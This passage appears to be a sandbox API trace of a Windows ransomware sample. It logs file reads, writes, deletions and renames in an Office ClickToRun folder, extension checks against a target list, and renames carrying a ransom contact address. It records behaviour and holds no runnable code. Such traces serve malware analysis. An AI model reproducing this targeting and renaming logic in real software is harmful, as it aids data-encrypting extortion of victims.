[0178.733] ReadFile (in: hFile=0x350, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x5ac0, lpOverlapped=0x0) returned 1 [0179.112] WriteFile (in: hFile=0x354, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x5ad0, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x5ad0, lpOverlapped=0x0) returned 1 [0179.114] ReadFile (in: hFile=0x350, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0179.114] WriteFile (in: hFile=0x354, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x116, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x116, lpOverlapped=0x0) returned 1 [0179.114] SetEndOfFile (hFile=0x354) returned 1 [0179.114] CloseHandle (hObject=0x354) returned 1 [0179.114] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0179.114] SetEndOfFile (hFile=0x350) returned 1 [0179.115] CloseHandle (hObject=0x350) returned 1 [0179.115] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0179.116] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll")) returned 1 [0179.116] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll") returned 91 [0179.116] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll") returned 91 [0179.116] lstrlenW (lpString=".doc") returned 4 [0179.116] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.116] lstrlenW (lpString=".docx") returned 5 [0179.116] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0179.116] lstrlenW (lpString=".pdf") returned 4 [0179.116] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.116] lstrlenW (lpString=".xls") returned 4 [0179.116] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.116] lstrlenW (lpString=".xlsx") returned 5 [0179.116] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0179.116] lstrlenW (lpString=".ppt") returned 4 [0179.116] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll") returned 91 [0179.117] lstrlenW (lpString=".zip") returned 4 [0179.117] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.117] lstrlenW (lpString=".rar") returned 4 [0179.117] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.117] lstrlenW (lpString=".bz2") returned 4 [0179.117] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.117] lstrlenW (lpString=".7z") returned 3 [0179.117] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll") returned 91 [0179.117] lstrlenW (lpString=".dbf") returned 4 [0179.117] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll") returned 91 [0179.117] lstrlenW (lpString=".1cd") returned 4 [0179.117] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll") returned 91 [0179.117] lstrlenW (lpString=".jpg") returned 4 [0179.117] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll") returned 91 [0179.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll") returned 91 [0179.117] lstrlenW (lpString=".doc") returned 4 [0179.117] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.117] lstrlenW (lpString=".docx") returned 5 [0179.117] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0179.117] lstrlenW (lpString=".pdf") returned 4 [0179.117] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.117] lstrlenW (lpString=".xls") returned 4 [0179.118] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.118] lstrlenW (lpString=".xlsx") returned 5 [0179.118] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0179.118] lstrlenW (lpString=".ppt") returned 4 [0179.118] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll") returned 91 [0179.118] lstrlenW (lpString=".zip") returned 4 [0179.118] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.118] lstrlenW (lpString=".rar") returned 4 [0179.118] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.118] lstrlenW (lpString=".bz2") returned 4 [0179.118] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.118] lstrlenW (lpString=".7z") returned 3 [0179.118] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll") returned 91 [0179.118] lstrlenW (lpString=".dbf") returned 4 [0179.118] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll") returned 91 [0179.118] lstrlenW (lpString=".1cd") returned 4 [0179.118] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll") returned 91 [0179.118] lstrlenW (lpString=".jpg") returned 4 [0179.118] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.118] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0179.119] lstrlenW (lpString="AppVFileSystemMetadata.dll") returned 26 [0179.119] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvfilesystemmetadata.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0179.119] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=307416) returned 1 [0179.119] CloseHandle (hObject=0x350) returned 1 [0179.119] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvfilesystemmetadata.dll")) returned 0x20 [0179.119] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvfilesystemmetadata.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.119] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvfilesystemmetadata.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll") returned 84 [0179.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll") returned 84 [0179.120] lstrlenW (lpString=".doc") returned 4 [0179.120] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.120] lstrlenW (lpString=".docx") returned 5 [0179.120] lstrcmpiW (lpString1=".docx", lpString2="a.dll") returned -1 [0179.120] lstrlenW (lpString=".pdf") returned 4 [0179.120] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.120] lstrlenW (lpString=".xls") returned 4 [0179.120] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.120] lstrlenW (lpString=".xlsx") returned 5 [0179.120] lstrcmpiW (lpString1=".xlsx", lpString2="a.dll") returned -1 [0179.120] lstrlenW (lpString=".ppt") returned 4 [0179.120] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll") returned 84 [0179.120] lstrlenW (lpString=".zip") returned 4 [0179.120] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.120] lstrlenW (lpString=".rar") returned 4 [0179.120] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.120] lstrlenW (lpString=".bz2") returned 4 [0179.120] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.120] lstrlenW (lpString=".7z") returned 3 [0179.120] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll") returned 84 [0179.120] lstrlenW (lpString=".dbf") returned 4 [0179.120] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll") returned 84 [0179.121] lstrlenW (lpString=".1cd") returned 4 [0179.121] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll") returned 84 [0179.121] lstrlenW (lpString=".jpg") returned 4 [0179.121] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll") returned 84 [0179.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll") returned 84 [0179.121] lstrlenW (lpString=".doc") returned 4 [0179.121] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.121] lstrlenW (lpString=".docx") returned 5 [0179.121] lstrcmpiW (lpString1=".docx", lpString2="a.dll") returned -1 [0179.121] lstrlenW (lpString=".pdf") returned 4 [0179.121] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.121] lstrlenW (lpString=".xls") returned 4 [0179.121] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.121] lstrlenW (lpString=".xlsx") returned 5 [0179.121] lstrcmpiW (lpString1=".xlsx", lpString2="a.dll") returned -1 [0179.121] lstrlenW (lpString=".ppt") returned 4 [0179.121] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll") returned 84 [0179.121] lstrlenW (lpString=".zip") returned 4 [0179.121] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.121] lstrlenW (lpString=".rar") returned 4 [0179.121] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.121] lstrlenW (lpString=".bz2") returned 4 [0179.121] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.121] lstrlenW (lpString=".7z") returned 3 [0179.121] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.122] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll") returned 84 [0179.122] lstrlenW (lpString=".dbf") returned 4 [0179.122] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.122] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll") returned 84 [0179.122] lstrlenW (lpString=".1cd") returned 4 [0179.122] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.122] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll") returned 84 [0179.122] lstrlenW (lpString=".jpg") returned 4 [0179.122] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.122] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0179.122] lstrlenW (lpString="AppVIntegration.dll") returned 19 [0179.122] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0179.122] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=2118360) returned 1 [0179.122] CloseHandle (hObject=0x350) returned 1 [0179.123] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll")) returned 0x20 [0179.123] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.123] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 1 [0179.124] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.124] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0179.124] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll")) returned 1 [0179.125] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll") returned 77 [0179.125] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll") returned 77 [0179.125] lstrlenW (lpString=".doc") returned 4 [0179.125] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.125] lstrlenW (lpString=".docx") returned 5 [0179.125] lstrcmpiW (lpString1=".docx", lpString2="n.dll") returned -1 [0179.125] lstrlenW (lpString=".pdf") returned 4 [0179.125] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.125] lstrlenW (lpString=".xls") returned 4 [0179.125] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.125] lstrlenW (lpString=".xlsx") returned 5 [0179.125] lstrcmpiW (lpString1=".xlsx", lpString2="n.dll") returned -1 [0179.125] lstrlenW (lpString=".ppt") returned 4 [0179.125] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.125] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll") returned 77 [0179.125] lstrlenW (lpString=".zip") returned 4 [0179.125] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.125] lstrlenW (lpString=".rar") returned 4 [0179.125] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.125] lstrlenW (lpString=".bz2") returned 4 [0179.125] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.125] lstrlenW (lpString=".7z") returned 3 [0179.125] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.125] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll") returned 77 [0179.125] lstrlenW (lpString=".dbf") returned 4 [0179.126] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.126] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll") returned 77 [0179.126] lstrlenW (lpString=".1cd") returned 4 [0179.126] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.126] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll") returned 77 [0179.126] lstrlenW (lpString=".jpg") returned 4 [0179.126] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.126] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll") returned 77 [0179.126] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll") returned 77 [0179.126] lstrlenW (lpString=".doc") returned 4 [0179.126] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.126] lstrlenW (lpString=".docx") returned 5 [0179.126] lstrcmpiW (lpString1=".docx", lpString2="n.dll") returned -1 [0179.126] lstrlenW (lpString=".pdf") returned 4 [0179.126] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.126] lstrlenW (lpString=".xls") returned 4 [0179.126] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.126] lstrlenW (lpString=".xlsx") returned 5 [0179.126] lstrcmpiW (lpString1=".xlsx", lpString2="n.dll") returned -1 [0179.126] lstrlenW (lpString=".ppt") returned 4 [0179.126] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.126] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll") returned 77 [0179.126] lstrlenW (lpString=".zip") returned 4 [0179.126] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.126] lstrlenW (lpString=".rar") returned 4 [0179.126] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.126] lstrlenW (lpString=".bz2") returned 4 [0179.126] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.127] lstrlenW (lpString=".7z") returned 3 [0179.127] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll") returned 77 [0179.127] lstrlenW (lpString=".dbf") returned 4 [0179.127] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll") returned 77 [0179.127] lstrlenW (lpString=".1cd") returned 4 [0179.127] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll") returned 77 [0179.127] lstrlenW (lpString=".jpg") returned 4 [0179.127] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.127] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0179.127] lstrlenW (lpString="AppVIsvApi.dll") returned 14 [0179.127] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0179.128] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=468696) returned 1 [0179.128] CloseHandle (hObject=0x350) returned 1 [0179.128] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvapi.dll")) returned 0x20 [0179.128] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvapi.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.128] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.128] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll") returned 72 [0179.128] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll") returned 72 [0179.129] lstrlenW (lpString=".doc") returned 4 [0179.129] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.129] lstrlenW (lpString=".docx") returned 5 [0179.129] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0179.129] lstrlenW (lpString=".pdf") returned 4 [0179.129] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.129] lstrlenW (lpString=".xls") returned 4 [0179.129] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.129] lstrlenW (lpString=".xlsx") returned 5 [0179.129] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0179.129] lstrlenW (lpString=".ppt") returned 4 [0179.129] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.129] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll") returned 72 [0179.129] lstrlenW (lpString=".zip") returned 4 [0179.129] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.129] lstrlenW (lpString=".rar") returned 4 [0179.129] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.129] lstrlenW (lpString=".bz2") returned 4 [0179.129] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.129] lstrlenW (lpString=".7z") returned 3 [0179.129] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.129] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll") returned 72 [0179.129] lstrlenW (lpString=".dbf") returned 4 [0179.129] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.129] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll") returned 72 [0179.129] lstrlenW (lpString=".1cd") returned 4 [0179.129] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.129] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll") returned 72 [0179.129] lstrlenW (lpString=".jpg") returned 4 [0179.130] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.130] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll") returned 72 [0179.130] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll") returned 72 [0179.130] lstrlenW (lpString=".doc") returned 4 [0179.130] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.130] lstrlenW (lpString=".docx") returned 5 [0179.130] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0179.130] lstrlenW (lpString=".pdf") returned 4 [0179.130] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.130] lstrlenW (lpString=".xls") returned 4 [0179.130] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.130] lstrlenW (lpString=".xlsx") returned 5 [0179.130] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0179.130] lstrlenW (lpString=".ppt") returned 4 [0179.130] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.130] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll") returned 72 [0179.130] lstrlenW (lpString=".zip") returned 4 [0179.130] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.130] lstrlenW (lpString=".rar") returned 4 [0179.130] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.130] lstrlenW (lpString=".bz2") returned 4 [0179.130] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.130] lstrlenW (lpString=".7z") returned 3 [0179.130] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.130] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll") returned 72 [0179.130] lstrlenW (lpString=".dbf") returned 4 [0179.130] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.131] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll") returned 72 [0179.131] lstrlenW (lpString=".1cd") returned 4 [0179.131] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.131] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll") returned 72 [0179.131] lstrlenW (lpString=".jpg") returned 4 [0179.131] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.131] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0179.131] lstrlenW (lpString="AppvIsvStream32.dll") returned 19 [0179.131] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0179.132] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=396960) returned 1 [0179.132] CloseHandle (hObject=0x350) returned 1 [0179.132] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll")) returned 0x20 [0179.132] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft 